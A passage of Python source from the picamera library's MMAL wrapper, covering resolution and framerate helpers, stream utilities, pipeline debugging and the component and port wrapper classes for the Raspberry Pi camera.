mmal.MMAL_PARAMETER_VIDEO_ENCODE_SEI_ENABLE: mmal.MMAL_PARAMETER_BOOLEAN_T,
mmal.MMAL_PARAMETER_VIDEO_ENCODE_SPS_TIMING: mmal.MMAL_PARAMETER_BOOLEAN_T,
mmal.MMAL_PARAMETER_VIDEO_FRAME_RATE: mmal.MMAL_PARAMETER_RATIONAL_T, # actually mmal.MMAL_PARAMETER_FRAME_RATE_T but this only contains a rational anyway...
mmal.MMAL_PARAMETER_VIDEO_IMMUTABLE_INPUT: mmal.MMAL_PARAMETER_BOOLEAN_T,
mmal.MMAL_PARAMETER_VIDEO_INTERLACE_TYPE: mmal.MMAL_PARAMETER_VIDEO_INTERLACE_TYPE_T,
mmal.MMAL_PARAMETER_VIDEO_INTERPOLATE_TIMESTAMPS: mmal.MMAL_PARAMETER_BOOLEAN_T,
mmal.MMAL_PARAMETER_VIDEO_INTRA_REFRESH: mmal.MMAL_PARAMETER_VIDEO_INTRA_REFRESH_T,
mmal.MMAL_PARAMETER_VIDEO_LEVEL_EXTENSION: mmal.MMAL_PARAMETER_VIDEO_LEVEL_EXTENSION_T,
mmal.MMAL_PARAMETER_VIDEO_MAX_NUM_CALLBACKS: mmal.MMAL_PARAMETER_UINT32_T,
mmal.MMAL_PARAMETER_VIDEO_RENDER_STATS: mmal.MMAL_PARAMETER_VIDEO_RENDER_STATS_T,
mmal.MMAL_PARAMETER_VIDEO_REQUEST_I_FRAME: mmal.MMAL_PARAMETER_BOOLEAN_T,
mmal.MMAL_PARAMETER_VIDEO_STABILISATION: mmal.MMAL_PARAMETER_BOOLEAN_T,
mmal.MMAL_PARAMETER_ZERO_COPY: mmal.MMAL_PARAMETER_BOOLEAN_T,
mmal.MMAL_PARAMETER_ZERO_SHUTTER_LAG: mmal.MMAL_PARAMETER_ZEROSHUTTERLAG_T,
mmal.MMAL_PARAMETER_ZOOM: mmal.MMAL_PARAMETER_SCALEFACTOR_T,
}
class PiCameraFraction(Fraction):
"""
Extends :class:`~fractions.Fraction` to act as a (numerator, denominator)
tuple when required.
"""
def __len__(self):
warnings.warn(
PiCameraDeprecated(
'Accessing framerate as a tuple is deprecated; this value is '
'now a Fraction, so you can query the numerator and '
'denominator properties directly, convert to an int or float, '
'or perform arithmetic operations and comparisons directly'))
return 2
def __getitem__(self, index):
warnings.warn(
PiCameraDeprecated(
'Accessing framerate as a tuple is deprecated; this value is '
'now a Fraction, so you can query the numerator and '
'denominator properties directly, convert to an int or float, '
'or perform arithmetic operations and comparisons directly'))
if index == 0:
return self.numerator
elif index == 1:
return self.denominator
else:
raise IndexError('invalid index %d' % index)
def __contains__(self, value):
return value in (self.numerator, self.denominator)
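# Illustrative sketch (not part of the original module): PiCameraFraction acts
# like a normal Fraction but also tolerates legacy tuple-style access, emitting
# a PiCameraDeprecated warning when it is used that way. Values assume a
# framerate of 30/1.
#
#     f = PiCameraFraction(30, 1)
#     float(f)       # 30.0 - ordinary Fraction behaviour
#     f.numerator    # 30
#     f[0], f[1]     # (30, 1), but each access raises a deprecation warning
#     len(f)         # 2, also deprecated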
class PiResolution(namedtuple('PiResolution', ('width', 'height'))):
"""
A :func:`~collections.namedtuple` derivative which represents a resolution
with a :attr:`width` and :attr:`height`.
.. attribute:: width
The width of the resolution in pixels
.. attribute:: height
The height of the resolution in pixels
.. versionadded:: 1.11
"""
__slots__ = () # workaround python issue #24931
def pad(self, width=32, height=16):
"""
Returns the resolution padded up to the nearest multiple of *width*
and *height* which default to 32 and 16 respectively (the camera's
native block size for most operations). For example:
.. code-block:: pycon
>>> PiResolution(1920, 1080).pad()
PiResolution(width=1920, height=1088)
>>> PiResolution(100, 100).pad()
PiResolution(width=128, height=112)
>>> PiResolution(100, 100).pad(16, 16)
PiResolution(width=112, height=112)
"""
return PiResolution(
width=((self.width + (width - 1)) // width) * width,
height=((self.height + (height - 1)) // height) * height,
)
def transpose(self):
"""
Returns the resolution with the width and height transposed. For
example:
.. code-block:: pycon
>>> PiResolution(1920, 1080).transpose()
PiResolution(width=1080, height=1920)
"""
return PiResolution(self.height, self.width)
def __str__(self):
return '%dx%d' % (self.width, self.height)
class PiFramerateRange(namedtuple('PiFramerateRange', ('low', 'high'))):
"""
This class is a :func:`~collections.namedtuple` derivative used to store
the low and high limits of a range of framerates. It is recommended that
you access the information stored by this class by attribute rather than
position (for example: ``camera.framerate_range.low`` rather than
``camera.framerate_range[0]``).
.. attribute:: low
The lowest framerate that the camera is permitted to use (inclusive).
When the :attr:`~picamera.PiCamera.framerate_range` attribute is
queried, this value will always be returned as a
:class:`~fractions.Fraction`.
.. attribute:: high
The highest framerate that the camera is permitted to use (inclusive).
When the :attr:`~picamera.PiCamera.framerate_range` attribute is
queried, this value will always be returned as a
:class:`~fractions.Fraction`.
.. versionadded:: 1.13
"""
__slots__ = () # workaround python issue #24931
def __str__(self):
return '%s..%s' % (self.low, self.high)
def open_stream(stream, output=True, buffering=65536):
"""
This is the core of picamera's IO-semantics. It returns a tuple of a
file-like object and a bool indicating whether the stream requires closing
once the caller is finished with it.
* If *stream* is a string, it is opened as a file object (with mode 'wb' if
*output* is ``True``, and the specified amount of *buffering*). In this
case the function returns ``(stream, True)``.
* If *stream* is a stream with a ``write`` method, it is returned as
``(stream, False)``.
* Otherwise *stream* is assumed to be a writeable buffer and is wrapped
with :class:`BufferIO`. The function returns ``(stream, True)``.
"""
if isinstance(stream, bytes):
stream = stream.decode('ascii')
opened = isinstance(stream, str)
if opened:
stream = io.open(stream, 'wb' if output else 'rb', buffering)
else:
try:
if output:
stream.write
else:
stream.read
except AttributeError:
# Assume the stream is actually a buffer
opened = True
stream = BufferIO(stream)
if output and not stream.writable:
raise IOError('writeable buffer required for output')
return (stream, opened)
def close_stream(stream, opened):
"""
If *opened* is ``True``, then the ``close`` method of *stream* will be
called. Otherwise, the function will attempt to call the ``flush`` method
on *stream* (if one exists). This function essentially takes the output
of :func:`open_stream` and finalizes the result.
"""
if opened:
stream.close()
else:
try:
stream.flush()
except AttributeError:
pass
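# Illustrative sketch (not part of the original module) of the intended
# open_stream/close_stream pairing. The filename below is hypothetical; any
# object with a write method, or a writeable buffer, works equally well.
#
#     stream, opened = open_stream('capture.h264')   # opens the file; opened=True
#     try:
#         stream.write(b'\x00\x00\x00\x01')          # caller writes data
#     finally:
#         close_stream(stream, opened)               # closes only because we opened it
#
#     buf = io.BytesIO()
#     stream, opened = open_stream(buf)              # returns (buf, False)
#     close_stream(stream, opened)                   # just flushes the stream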
def to_resolution(value):
"""
Converts *value* which may be a (width, height) tuple or a string
containing a representation of a resolution (e.g. "1024x768" or "1080p") to
a (width, height) tuple.
"""
if isinstance(value, bytes):
value = value.decode('utf-8')
if isinstance(value, str):
try:
# A selection from https://en.wikipedia.org/wiki/Graphics_display_resolution
# Feel free to suggest additions
w, h = {
'VGA': (640, 480),
'SVGA': (800, 600),
'XGA': (1024, 768),
'SXGA': (1280, 1024),
'UXGA': (1600, 1200),
'HD': (1280, 720),
'FHD': (1920, 1080),
'1080P': (1920, 1080),
'720P': (1280, 720),
}[value.strip().upper()]
except KeyError:
w, h = (int(i.strip()) for i in value.upper().split('X', 1))
else:
try:
w, h = value
except (TypeError, ValueError):
raise PiCameraValueError("Invalid resolution tuple: %r" % value)
return PiResolution(w, h)
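# Illustrative examples (not part of the original module) of the inputs that
# to_resolution accepts; each normalizes to a PiResolution:
#
#     to_resolution('720p')        # PiResolution(width=1280, height=720)
#     to_resolution('1024x768')    # PiResolution(width=1024, height=768)
#     to_resolution((640, 360))    # PiResolution(width=640, height=360)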
def to_fraction(value, den_limit=65536):
"""
Converts *value*, which can be any numeric type, an MMAL_RATIONAL_T, or a
(numerator, denominator) tuple to a :class:`~fractions.Fraction` limiting
the denominator to the range 0 < n <= *den_limit* (which defaults to
65536).
"""
try:
# int, long, or fraction
n, d = value.numerator, value.denominator
except AttributeError:
try:
# float
n, d = value.as_integer_ratio()
except AttributeError:
try:
n, d = value.num, value.den
except AttributeError:
try:
# tuple
n, d = value
warnings.warn(
PiCameraDeprecated(
"Setting framerate or gains as a tuple is "
"deprecated; please use one of Python's many "
"numeric classes like int, float, Decimal, or "
"Fraction instead"))
except (TypeError, ValueError):
# try and convert anything else to a Fraction directly
value = Fraction(value)
n, d = value.numerator, value.denominator
# Ensure denominator is reasonable
if d == 0:
raise PiCameraValueError("Denominator cannot be 0")
elif d > den_limit:
return Fraction(n, d).limit_denominator(den_limit)
else:
return Fraction(n, d)
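# Illustrative examples (not part of the original module) of to_fraction's
# accepted inputs; everything is reduced to a Fraction with a denominator no
# larger than den_limit:
#
#     to_fraction(30)                     # Fraction(30, 1)
#     to_fraction(0.5)                    # Fraction(1, 2)
#     to_fraction(Fraction(2997, 100))    # Fraction(2997, 100)
#     to_fraction((30, 1))                # Fraction(30, 1), with a deprecation warning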
def to_rational(value):
"""
Converts *value* (which can be anything accepted by :func:`to_fraction`) to
an MMAL_RATIONAL_T structure.
"""
value = to_fraction(value)
return mmal.MMAL_RATIONAL_T(value.numerator, value.denominator)
def buffer_bytes(buf):
"""
Given an object which implements the :ref:`buffer protocol
<bufferobjects>`, this function returns the size of the object in bytes.
The object can be multi-dimensional or include items larger than byte-size.
"""
if not isinstance(buf, memoryview):
buf = memoryview(buf)
return buf.itemsize * reduce(mul, buf.shape)
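# Illustrative examples (not part of the original module): buffer_bytes reports
# the total byte size of any buffer-protocol object:
#
#     buffer_bytes(bytearray(100))        # 100
#     buffer_bytes(memoryview(b'abcd'))   # 4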
def debug_pipeline(port):
"""
Given an :class:`MMALVideoPort` *port*, this traces all objects in the
pipeline feeding it (including components and connections) and yields each
object in turn. Hence the generator typically yields something like:
* :class:`MMALVideoPort` (the specified output port)
* :class:`MMALEncoder` (the encoder which owns the output port)
* :class:`MMALVideoPort` (the encoder's input port)
* :class:`MMALConnection` (the connection between the splitter and encoder)
* :class:`MMALVideoPort` (the splitter's output port)
* :class:`MMALSplitter` (the splitter on the camera's video port)
* :class:`MMALVideoPort` (the splitter's input port)
* :class:`MMALConnection` (the connection between the splitter and camera)
* :class:`MMALVideoPort` (the camera's video port)
* :class:`MMALCamera` (the camera component)
"""
def find_port(addr):
for obj in MMALObject.REGISTRY:
if isinstance(obj, MMALControlPort):
if ct.addressof(obj._port[0]) == addr:
return obj
raise IndexError('unable to locate port with address %x' % addr)
def find_component(addr):
for obj in MMALObject.REGISTRY:
if isinstance(obj, MMALBaseComponent) and obj._component is not None:
if ct.addressof(obj._component[0]) == addr:
return obj
raise IndexError('unable to locate component with address %x' % addr)
assert isinstance(port, (MMALControlPort, MMALPythonPort))
while True:
if port.type == mmal.MMAL_PORT_TYPE_OUTPUT:
yield port
if isinstance(port, MMALPythonPort):
comp = port._owner()
else:
comp = find_component(ct.addressof(port._port[0].component[0]))
yield comp
if not isinstance(comp, (MMALComponent, MMALPythonComponent)):
break
if comp.connection is None:
break
if isinstance(comp.connection, MMALPythonConnection):
port = comp.connection._target
else:
port = find_port(ct.addressof(comp.connection._connection[0].in_[0]))
yield port
yield comp.connection
if isinstance(comp.connection, MMALPythonConnection):
port = comp.connection._source
else:
port = find_port(ct.addressof(comp.connection._connection[0].out[0]))
def print_pipeline(port):
"""
Prints a human readable representation of the pipeline feeding the
specified :class:`MMALVideoPort` *port*.
"""
rows = [[], [], [], [], []]
under_comp = False
for obj in reversed(list(debug_pipeline(port))):
if isinstance(obj, (MMALBaseComponent, MMALPythonBaseComponent)):
rows[0].append(obj.name)
under_comp = True
elif isinstance(obj, MMALVideoPort):
rows[0].append('[%d]' % obj._port[0].index)
if under_comp:
rows[1].append('encoding')
if obj.format == mmal.MMAL_ENCODING_OPAQUE:
rows[1].append(obj.opaque_subformat)
else:
rows[1].append(mmal.FOURCC_str(obj._port[0].format[0].encoding))
if under_comp:
rows[2].append('buf')
rows[2].append('%dx%d' % (obj._port[0].buffer_num, obj._port[0].buffer_size))
if under_comp:
rows[3].append('bitrate')
rows[3].append('%dbps' % (obj._port[0].format[0].bitrate,))
if under_comp:
rows[4].append('frame')
under_comp = False
rows[4].append('%dx%d@%sfps' % (
obj._port[0].format[0].es[0].video.width,
obj._port[0].format[0].es[0].video.height,
obj.framerate))
elif isinstance(obj, MMALPythonPort):
rows[0].append('[%d]' % obj._index)
if under_comp:
rows[1].append('encoding')
if obj.format == mmal.MMAL_ENCODING_OPAQUE:
rows[1].append(obj.opaque_subformat)
else:
rows[1].append(mmal.FOURCC_str(obj._format[0].encoding))
if under_comp:
rows[2].append('buf')
rows[2].append('%dx%d' % (obj.buffer_count, obj.buffer_size))
if under_comp:
rows[3].append('bitrate')
rows[3].append('%dbps' % (obj._format[0].bitrate,))
if under_comp:
rows[4].append('frame')
under_comp = False
rows[4].append('%dx%d@%sfps' % (
obj._format[0].es[0].video.width,
obj._format[0].es[0].video.height,
obj.framerate))
elif isinstance(obj, (MMALConnection, MMALPythonConnection)):
rows[0].append('')
rows[1].append('')
rows[2].append('-->')
rows[3].append('')
rows[4].append('')
if under_comp:
rows[1].append('encoding')
rows[2].append('buf')
rows[3].append('bitrate')
rows[4].append('frame')
cols = list(zip(*rows))
max_lens = [max(len(s) for s in col) + 2 for col in cols]
rows = [
''.join('{0:{align}{width}s}'.format(s, align=align, width=max_len)
for s, max_len, align in zip(row, max_lens, cycle('^<^>')))
for row in rows
]
for row in rows:
print(row)
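# Hypothetical usage sketch (not part of the original module): given the output
# port of an encoder connected back to a camera component, print_pipeline
# renders the chain of ports, components and connections feeding that port.
# 'encoder' here is an assumed component wrapper, not something defined above.
#
#     print_pipeline(encoder.outputs[0])
#
# This prints a table of component names, encodings, buffer counts/sizes,
# bitrates and frame sizes for every stage in the pipeline.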
class MMALObject(object):
"""
Represents an object wrapper around an MMAL object (component, port,
connection, etc). This base class maintains a registry of all MMAL objects
currently alive (via weakrefs) which permits object lookup by name and
listing all used MMAL objects.
"""
__slots__ = ('__weakref__',)
REGISTRY = weakref.WeakSet()
def __init__(self):
super(MMALObject, self).__init__()
MMALObject.REGISTRY.add(self)
class MMALBaseComponent(MMALObject):
"""
Represents a generic MMAL component. Class attributes are read to determine
the component type, and the OPAQUE sub-formats of each connectable port.
"""
__slots__ = ('_component', '_control', '_inputs', '_outputs')
component_type = b'none'
opaque_input_subformats = ()
opaque_output_subformats = ()
def __init__(self):
super(MMALBaseComponent, self).__init__()
self._component = ct.POINTER(mmal.MMAL_COMPONENT_T)()
mmal_check(
mmal.mmal_component_create(self.component_type, self._component),
prefix="Failed to create MMAL component %s" % self.component_type)
if self._component[0].input_num != len(self.opaque_input_subformats):
raise PiCameraRuntimeError(
'Expected %d inputs but found %d on component %s' % (
len(self.opaque_input_subformats),
self._component[0].input_num,
self.component_type))
if self._component[0].output_num != len(self.opaque_output_subformats):
raise PiCameraRuntimeError(
'Expected %d outputs but found %d on component %s' % (
len(self.opaque_output_subformats),
self._component[0].output_num,
self.component_type))
self._control = MMALControlPort(self._component[0].control)
port_class = {
mmal.MMAL_ES_TYPE_UNKNOWN: MMALPort,
mmal.MMAL_ES_TYPE_CONTROL: MMALControlPort,
mmal.MMAL_ES_TYPE_VIDEO: MMALVideoPort,
mmal.MMAL_ES_TYPE_AUDIO: MMALAudioPort,
mmal.MMAL_ES_TYPE_SUBPICTURE: MMALSubPicturePort,
}
self._inputs = tuple(
port_class[self._component[0].input[n][0].format[0].type](
self._component[0].input[n], opaque_subformat)
for n, opaque_subformat in enumerate(self.opaque_input_subformats))
self._outputs = tuple(
port_class[self._component[0].output[n][0].format[0].type](
self._component[0].output[n], opaque_subformat)
for n, opaque_subformat in enumerate(self.opaque_output_subformats))
def close(self):
"""
Close the component and release all its resources. After this is
called, most methods will raise exceptions if called.
"""
if self._component is not None:
# ensure we free any pools associated with input/output ports
for output in self.outputs:
output.disable()
for input in self.inputs:
input.disable()
mmal.mmal_component_destroy(self._component)
self._component = None
self._inputs = ()
self._outputs = ()
self._control = None
@property
def name(self):
return self._component[0].name.decode('ascii')
@property
def control(self):
"""
The :class:`MMALControlPort` control port of the component which can be
used to configure most aspects of the component's behaviour.
"""
return self._control
@property
def inputs(self):
"""
A sequence of :class:`MMALPort` objects representing the inputs
of the component.
"""
return self._inputs
@property
def outputs(self):
"""
A sequence of :class:`MMALPort` objects representing the outputs
of the component.
"""
return self._outputs
@property
def enabled(self):
"""
Returns ``True`` if the component is currently enabled. Use
:meth:`enable` and :meth:`disable` to control the component's state.
"""
return bool(self._component[0].is_enabled)
def enable(self):
"""
Enable the component. When a component is enabled it will process data
sent to its input port(s), sending the results to buffers on its output
port(s). Components may be implicitly enabled by connections.
"""
mmal_check(
mmal.mmal_component_enable(self._component),
prefix="Failed to enable component")
def disable(self):
"""
Disables the component.
"""
mmal_check(
mmal.mmal_component_disable(self._component),
prefix="Failed to disable component")
def __enter__(self):
return self
def __exit__(self, exc_type, exc_value, exc_tb):
self.close()
def __repr__(self):
if self._component is not None:
return '<%s "%s": %d inputs %d outputs>' % (
self.__class__.__name__, self.name,
len(self.inputs), len(self.outputs))
else:
return '<%s closed>' % self.__class__.__name__
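# Hypothetical usage sketch (not part of the original module): components are
# context managers, so the typical lifecycle is to construct a concrete
# subclass, configure its ports, then enable it. 'SomeComponent' stands in for
# any MMALBaseComponent subclass defined elsewhere.
#
#     with SomeComponent() as comp:
#         comp.outputs[0].format = mmal.MMAL_ENCODING_I420
#         comp.outputs[0].commit()
#         comp.enable()
#         ...                      # feed and collect buffers here
#         comp.disable()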
class MMALControlPort(MMALObject):
"""
Represents an MMAL port with properties to configure the port's parameters.
"""
__slots__ = ('_port', '_params', '_wrapper')
def __init__(self, port):
super(MMALControlPort, self).__init__()
self._port = port
self._params = MMALPortParams(port)
self._wrapper = None
@property
def index(self):
"""
Returns an integer indicating the port's position within its owning
list (inputs, outputs, etc.)
"""
return self._port[0].index
@property
def enabled(self):
"""
Returns a :class:`bool` indicating whether the port is currently
enabled. Unlike other classes, this is a read-only property. Use
:meth:`enable` and :meth:`disable` to modify the value.
"""
return bool(self._port[0].is_enabled)
def enable(self, callback=None):
"""
Enable the port with the specified callback function (this must be
``None`` for connected ports, and a callable for disconnected ports).
The callback function must accept two parameters which will be this
:class:`MMALControlPort` (or descendent) and an :class:`MMALBuffer`
instance. Any return value will be ignored.
"""
def wrapper(port, buf):
buf = MMALBuffer(buf)
try:
callback(self, buf)
finally:
buf.release()
if callback:
self._wrapper = mmal.MMAL_PORT_BH_CB_T(wrapper)
else:
self._wrapper = ct.cast(None, mmal.MMAL_PORT_BH_CB_T)
mmal_check(
mmal.mmal_port_enable(self._port, self._wrapper),
prefix="Unable to enable port %s" % self.name)
def disable(self):
"""
Disable the port.
"""
# NOTE: The test here only exists to avoid spamming the console; when
# disabling an already disabled port MMAL dumps errors to stderr. If
# this test isn't here closing a camera results in half a dozen lines
# of ignored errors
if self.enabled:
try:
mmal_check(
mmal.mmal_port_disable(self._port),
prefix="Unable to disable port %s" % self.name)
except PiCameraMMALError as e:
# Ignore the error if we're disabling an already disabled port
if not (e.status == mmal.MMAL_EINVAL and not self.enabled):
raise e
self._wrapper = None
@property
def name(self):
result = self._port[0].name.decode('ascii')
if result.endswith(')'):
try:
# strip (format) from port names as it doesn't really belong
# there (it doesn't identify the port in any way) and makes
# matching some of the correctional cases a pain
return result[:result.rindex('(')]
except ValueError:
return result
else:
return result
@property
def type(self):
"""
The type of the port. One of:
* MMAL_PORT_TYPE_OUTPUT
* MMAL_PORT_TYPE_INPUT
* MMAL_PORT_TYPE_CONTROL
* MMAL_PORT_TYPE_CLOCK
"""
return self._port[0].type
@property
def capabilities(self):
"""
The capabilities of the port. A bitfield of the following:
* MMAL_PORT_CAPABILITY_PASSTHROUGH
* MMAL_PORT_CAPABILITY_ALLOCATION
* MMAL_PORT_CAPABILITY_SUPPORTS_EVENT_FORMAT_CHANGE
"""
return self._port[0].capabilities
@property
def params(self):
"""
The configurable parameters for the port. This is presented as a
mutable mapping of parameter numbers to values, implemented by the
:class:`MMALPortParams` class.
"""
return self._params
def __repr__(self):
if self._port is not None:
return '<MMALControlPort "%s">' % self.name
else:
return '<MMALControlPort closed>'
class MMALPort(MMALControlPort):
"""
Represents an MMAL port with properties to configure and update the port's
format. This is the base class of :class:`MMALVideoPort`,
:class:`MMALAudioPort`, and :class:`MMALSubPicturePort`.
"""
__slots__ = ('_opaque_subformat', '_pool', '_stopped', '_connection')
# A mapping of corrected definitions of supported_formats for ports with
# particular names. Older firmwares either raised EINVAL, ENOSYS, or just
# reported the wrong things for various ports; these lists are derived from
# querying newer firmwares or in some cases guessing sensible defaults
# (for ports where even the newer firmwares get stuff wrong).
_supported_formats_patch = {
'vc.ril.camera:out:2': [
mmal.MMAL_ENCODING_I420,
mmal.MMAL_ENCODING_NV12,
mmal.MMAL_ENCODING_I422,
mmal.MMAL_ENCODING_YUYV,
mmal.MMAL_ENCODING_YVYU,
mmal.MMAL_ENCODING_VYUY,
mmal.MMAL_ENCODING_UYVY,
mmal.MMAL_ENCODING_BGR24,
mmal.MMAL_ENCODING_BGRA,
mmal.MMAL_ENCODING_RGB16,
mmal.MMAL_ENCODING_YV12,
mmal.MMAL_ENCODING_NV21,
mmal.MMAL_ENCODING_RGB24,
mmal.MMAL_ENCODING_RGBA,
],
'vc.ril.image_encode:in:0': [
mmal.MMAL_ENCODING_RGB16,
mmal.MMAL_ENCODING_RGB24,
mmal.MMAL_ENCODING_RGBA,
mmal.MMAL_ENCODING_BGRA,
mmal.MMAL_ENCODING_I420,
mmal.MMAL_ENCODING_I422,
mmal.MMAL_ENCODING_NV12,
mmal.MMAL_ENCODING_YUYV,
mmal.MMAL_ENCODING_YVYU,
mmal.MMAL_ENCODING_VYUY,
],
'vc.ril.image_encode:out:0': [
mmal.MMAL_ENCODING_JPEG,
mmal.MMAL_ENCODING_GIF,
mmal.MMAL_ENCODING_PNG,
mmal.MMAL_ENCODING_BMP,
mmal.MMAL_ENCODING_PPM,
mmal.MMAL_ENCODING_TGA,
],
'vc.ril.resize:in:0': [
mmal.MMAL_ENCODING_RGBA,
mmal.MMAL_ENCODING_BGRA,
mmal.MMAL_ENCODING_RGB16,
mmal.MMAL_ENCODING_I420,
# several invalid encodings (lowercase versions of the priors)
# appear here in modern firmwares but since they don't map to any
# constants they're excluded
mmal.MMAL_ENCODING_I420_SLICE,
],
'vc.ril.resize:out:0': [
mmal.MMAL_ENCODING_RGBA,
mmal.MMAL_ENCODING_BGRA,
mmal.MMAL_ENCODING_RGB16,
mmal.MMAL_ENCODING_I420,
# same invalid encodings as above here
mmal.MMAL_ENCODING_I420_SLICE,
],
'vc.ril.isp:in:0': [
mmal.MMAL_ENCODING_BAYER_SBGGR8,
mmal.MMAL_ENCODING_BAYER_SBGGR10DPCM8,
mmal.MMAL_ENCODING_BAYER_SBGGR10P,
mmal.MMAL_ENCODING_BAYER_SBGGR12P,
mmal.MMAL_ENCODING_YUYV,
mmal.MMAL_ENCODING_YVYU,
mmal.MMAL_ENCODING_VYUY,
mmal.MMAL_ENCODING_UYVY,
mmal.MMAL_ENCODING_I420,
mmal.MMAL_ENCODING_YV12,
mmal.MMAL_ENCODING_I422,
mmal.MMAL_ENCODING_RGB24,
mmal.MMAL_ENCODING_BGR24,
mmal.MMAL_ENCODING_RGBA,
mmal.MMAL_ENCODING_BGRA,
mmal.MMAL_ENCODING_RGB16,
mmal.MMAL_ENCODING_YUVUV128,
mmal.MMAL_ENCODING_NV12,
mmal.MMAL_ENCODING_NV21,
],
'vc.ril.isp:out:0': [
mmal.MMAL_ENCODING_YUYV,
mmal.MMAL_ENCODING_YVYU,
mmal.MMAL_ENCODING_VYUY,
mmal.MMAL_ENCODING_UYVY,
mmal.MMAL_ENCODING_I420,
mmal.MMAL_ENCODING_YV12,
mmal.MMAL_ENCODING_I422,
mmal.MMAL_ENCODING_RGB24,
mmal.MMAL_ENCODING_BGR24,
mmal.MMAL_ENCODING_RGBA,
mmal.MMAL_ENCODING_BGRA,
mmal.MMAL_ENCODING_RGB16,
mmal.MMAL_ENCODING_YUVUV128,
mmal.MMAL_ENCODING_NV12,
mmal.MMAL_ENCODING_NV21,
],
'vc.null_sink:in:0': [
mmal.MMAL_ENCODING_I420,
mmal.MMAL_ENCODING_RGB24,
mmal.MMAL_ENCODING_BGR24,
mmal.MMAL_ENCODING_RGBA,
mmal.MMAL_ENCODING_BGRA,
],
}
def __init__(self, port, opaque_subformat='OPQV'):
super(MMALPort, self).__init__(port)
self.opaque_subformat = opaque_subformat
self._pool = None
self._stopped = True
self._connection = None
def __repr__(self):
if self._port is not None:
return '<MMALPort "%s": format=MMAL_FOURCC(%r) buffers=%dx%d>' % (
self.name, mmal.FOURCC_str(self.format),
self.buffer_count, self.buffer_size)
else:
return '<MMALPort closed>'
def _get_opaque_subformat(self):
return self._opaque_subformat
def _set_opaque_subformat(self, value):
self._opaque_subformat = value
opaque_subformat = property(
_get_opaque_subformat, _set_opaque_subformat, doc="""\
Retrieves or sets the opaque sub-format that the port speaks. While
most formats (I420, RGBA, etc.) mean one thing, the opaque format is
special; different ports produce different sorts of data when
configured for OPQV format. This property stores a string which
uniquely identifies what the associated port means for OPQV format.
If the port does not support opaque format at all, set this property to
``None``.
:class:`MMALConnection` uses this information when negotiating formats
for a connection between two ports.
""")
def _get_format(self):
result = self._port[0].format[0].encoding
if FIX_RGB_BGR_ORDER:
return {
mmal.MMAL_ENCODING_RGB24: mmal.MMAL_ENCODING_BGR24,
mmal.MMAL_ENCODING_BGR24: mmal.MMAL_ENCODING_RGB24,
}.get(result, result)
else:
return result
def _set_format(self, value):
if FIX_RGB_BGR_ORDER:
value = {
mmal.MMAL_ENCODING_RGB24: mmal.MMAL_ENCODING_BGR24,
mmal.MMAL_ENCODING_BGR24: mmal.MMAL_ENCODING_RGB24,
}.get(value, value)
self._port[0].format[0].encoding = value
if value == mmal.MMAL_ENCODING_OPAQUE:
self._port[0].format[0].encoding_variant = mmal.MMAL_ENCODING_I420
format = property(_get_format, _set_format, doc="""\
Retrieves or sets the encoding format of the port. Setting this
attribute implicitly sets the encoding variant to a sensible value
(I420 in the case of OPAQUE).
After setting this attribute, call :meth:`commit` to make the changes
effective.
""")
@property
def supported_formats(self):
"""
Retrieves a sequence of supported encodings on this port.
"""
try:
mp = self.params[mmal.MMAL_PARAMETER_SUPPORTED_ENCODINGS]
except PiCameraMMALError as e:
if e.status in (mmal.MMAL_EINVAL, mmal.MMAL_ENOSYS):
# Workaround: old firmwares raise EINVAL or ENOSYS when various
# ports are queried for supported formats. The following is the
# correct sequence for old firmwares (note: swapped RGB24 and
# BGR24 order in still port) ... probably (vc.ril.camera:out:2
# is definitely right, the rest are largely guessed based on
# queries of later firmwares)
try:
return MMALPort._supported_formats_patch[self.name]
except KeyError:
raise e
else:
raise
else:
result = [
v for v in mp.encoding if v != 0
][:mp.hdr.size // ct.sizeof(ct.c_uint32)]
# Workaround: Fix incorrect result on MMALImageEncoder.outputs[0]
# from modern firmwares
if self.name == 'vc.ril.image_encode:out:0' and result == [
mmal.MMAL_ENCODING_MP2V, mmal.MMAL_ENCODING_MP2V,
mmal.MMAL_ENCODING_H264, mmal.MMAL_ENCODING_H264,
mmal.MMAL_ENCODING_VP7, mmal.MMAL_ENCODING_VP7,
mmal.MMAL_ENCODING_VP6, mmal.MMAL_ENCODING_VP6]:
return MMALPort._supported_formats_patch[self.name]
else:
return result
def _get_bitrate(self):
return self._port[0].format[0].bitrate
def _set_bitrate(self, value):
self._port[0].format[0].bitrate = value
bitrate = property(_get_bitrate, _set_bitrate, doc="""\
Retrieves or sets the bitrate limit for the port's format.
""")
def copy_from(self, source):
"""
Copies the port's :attr:`format` from the *source*
:class:`MMALControlPort`.
"""
if isinstance(source, MMALPythonPort):
mmal.mmal_format_copy(self._port[0].format, source._format)
else:
mmal.mmal_format_copy(self._port[0].format, source._port[0].format)
def commit(self):
"""
Commits the port's configuration and automatically updates the number
and size of associated buffers according to the recommendations of the
MMAL library. This is typically called after adjusting the port's
format and/or associated settings (like width and height for video
ports).
"""
mmal_check(
mmal.mmal_port_format_commit(self._port),
prefix="Format couldn't be set on port %s" % self.name)
# Workaround: Unfortunately, there is an upstream issue with the
# buffer_num_recommended which means it can't currently be used (see
# discussion in raspberrypi/userland#167). There's another upstream
# issue with buffer_num_min which means we need to guard against 0
# values...
self._port[0].buffer_num = max(1, self._port[0].buffer_num_min)
self._port[0].buffer_size = (
self._port[0].buffer_size_recommended
if self._port[0].buffer_size_recommended > 0 else
self._port[0].buffer_size_min)
@property
def pool(self):
"""
Returns the :class:`MMALPool` associated with the buffer, if any.
"""
return self._pool
def get_buffer(self, block=True, timeout=None):
"""
Returns a :class:`MMALBuffer` from the associated :attr:`pool`. *block*
and *timeout* act as they do in the corresponding
:meth:`MMALPool.get_buffer`.
"""
if not self.enabled:
raise PiCameraPortDisabled(
'cannot get buffer from disabled port %s' % self.name)
return self.pool.get_buffer(block, timeout)
def send_buffer(self, buf):
"""
Send :class:`MMALBuffer` *buf* to the port.
"""
if (
self.type == mmal.MMAL_PORT_TYPE_INPUT and
isinstance(self._connection, MMALPythonConnection) and
self._connection._callback is not None):
try:
modified_buf = self._connection._callback(self._connection, buf)
except:
buf.release()
raise
else:
if modified_buf is None:
buf.release()
return
else:
buf = modified_buf
try:
mmal_check(
mmal.mmal_port_send_buffer(self._port, buf._buf),
prefix="cannot send buffer to port %s" % self.name)
except PiCameraMMALError as e:
# If port is disabled, convert exception for convenience
if e.status == mmal.MMAL_EINVAL and not self.enabled:
raise PiCameraPortDisabled(
'cannot send buffer to disabled port %s' % self.name)
else:
raise
def flush(self):
"""
Flush the port.
"""
mmal_check(
mmal.mmal_port_flush(self._port),
prefix="Unable to flush port %s" % self.name)
def _get_buffer_count(self):
